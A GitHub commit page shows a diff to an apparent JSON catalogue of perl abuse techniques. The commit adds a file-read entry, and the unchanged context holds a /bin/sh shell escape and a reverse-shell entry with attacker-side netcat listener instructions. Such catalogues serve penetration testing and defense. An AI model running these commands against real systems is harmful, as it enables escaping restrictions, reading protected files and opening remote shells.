add file read function to perl

master
Mr. Robot 3 years ago committed by GitHub
parent 690b2ff804
commit 844181be36
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -5,6 +5,11 @@
"code": "perl -e 'exec \"/bin/sh\";'" "code": "perl -e 'exec \"/bin/sh\";'"
} }
], ],
"file-read": [
{
"code": "perl -ne print [file]"
}
],
"reverse-shell": [ "reverse-shell": [
{ {
"description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.", "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
@ -27,4 +32,4 @@
} }
] ]
} }
} }

Loading…
Cancel
Save